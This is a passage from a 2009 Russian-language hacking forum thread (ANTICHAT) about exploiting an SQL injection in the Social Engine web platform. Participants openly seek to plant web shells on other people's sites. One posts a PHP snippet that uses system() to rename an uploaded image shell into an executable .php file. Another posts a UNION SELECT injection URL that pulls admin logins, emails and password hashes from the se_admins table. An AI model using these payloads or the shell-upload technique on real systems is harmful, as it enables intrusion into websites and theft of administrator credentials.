HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Веб-уязвимости
Перезагрузить страницу Social Engine SQL инекция !
   
Ответ
Страница 2 из 3 < 1 2 3 >
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 21.01.2009, 04:43
NFM
Постоянный
Регистрация: 16.01.2006
Сообщений: 598
С нами: 10692326

Репутация: 531


По умолчанию
читай тему что я показал. а админку и пароль лучше убери, засерут
 
Ответить с цитированием

Спасибо что ответили
  #12  
Старый 21.01.2009, 15:34
eworld.uz
Познающий
Регистрация: 18.01.2008
Сообщений: 31
С нами: 9638234

Репутация: 13
По умолчанию Спасибо что ответили
У меня просто есть этот двиг вот и показал вам пример таблицы на phpmyadmin сегодня буду пробовать все что посоветовали ! Ели что стукните мне в аску есть хорошый сайт на этот двиг надо залить шелл )
 
Ответить с цитированием

  #13  
Старый 21.01.2009, 16:02
eworld.uz
Познающий
Регистрация: 18.01.2008
Сообщений: 31
С нами: 9638234

Репутация: 13
По умолчанию
Друзья прочитал все темы но так и не смог залит шелл ( Помогите
 
Ответить с цитированием

  #14  
Старый 21.01.2009, 16:12
krobol
Познающий
Регистрация: 10.02.2008
Сообщений: 56
С нами: 9604947

Репутация: 14
По умолчанию
Присоединяюсь, тоже не смог залить.
По ссылке от NFM всё прочитал, пробовал - не получилось.

В дирректорию /uploads_user/ заливал картинки - 1.jpg с шеллом,
2.jpg:

PHP код:
<?php
   system("mv /var/www/admin/data/www/domen.com/uploads_user/1000/2/1.jpg /var/www/admin/data/www/domen.com/uploads_user/1000/2/1.php");
   die();
?>
но include через SQL не получается.

xcedz, через шаблоны тоже не работает - там даже в шапке редактора написано, что PHP отделён от шаблонов.
 
Ответить с цитированием

  #15  
Старый 22.01.2009, 11:29
eworld.uz
Познающий
Регистрация: 18.01.2008
Сообщений: 31
С нами: 9638234

Репутация: 13
По умолчанию
Krobol Какие успехи ?
 
Ответить с цитированием

  #16  
Старый 22.01.2009, 11:53
xcedz
Познавший АНТИЧАТ
Регистрация: 14.01.2008
Сообщений: 1,165
С нами: 9644006

Репутация: 3099


По умолчанию
https://forum.antichat.ru/thread50669.html

гляньте диры пхпмай админа, на всякий случай. =)
Последний раз редактировалось xcedz; 22.01.2009 в 12:20..
 
Ответить с цитированием

  #17  
Старый 22.01.2009, 12:25
heks
Постоянный
Регистрация: 24.08.2007
Сообщений: 474
С нами: 9849598

Репутация: 126
По умолчанию
PHP код:
browse_classifieds.php?s=classified_date%20DESC&v=0&classifiedcat_id=-1+UNION+SELECT+concat(admin_username,admin_email,0x3a,admin_password),2,3+from+se_admins 

поставил такой запрос но не работает как вывести хеш и логин админа


стукните в аську додумаем вместе как залить шел 858759
Последний раз редактировалось heks; 22.01.2009 в 12:34..
 
Ответить с цитированием

  #18  
Старый 22.01.2009, 17:15
krobol
Познающий
Регистрация: 10.02.2008
Сообщений: 56
С нами: 9604947

Репутация: 14
По умолчанию
eworld.uz, у меня пока ничего не получилось

heks, не на всех сайтах работает
 
Ответить с цитированием

  #19  
Старый 22.01.2009, 18:40
eworld.uz
Познающий
Регистрация: 18.01.2008
Сообщений: 31
С нами: 9638234

Репутация: 13
По умолчанию
Думаю работает только для версии 3.10
 
Ответить с цитированием

  #20  
Старый 23.01.2009, 11:30
c0m
Познающий
Регистрация: 26.01.2007
Сообщений: 40
С нами: 10152062

Репутация: 7
По умолчанию
Цитата:
Сообщение от eworld.uz  
Думаю работает только для версии 3.10
не только все зависит от самого плагина
 
Ответить с цитированием
Ответ
Страница 2 из 3 < 1 2 3 >



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.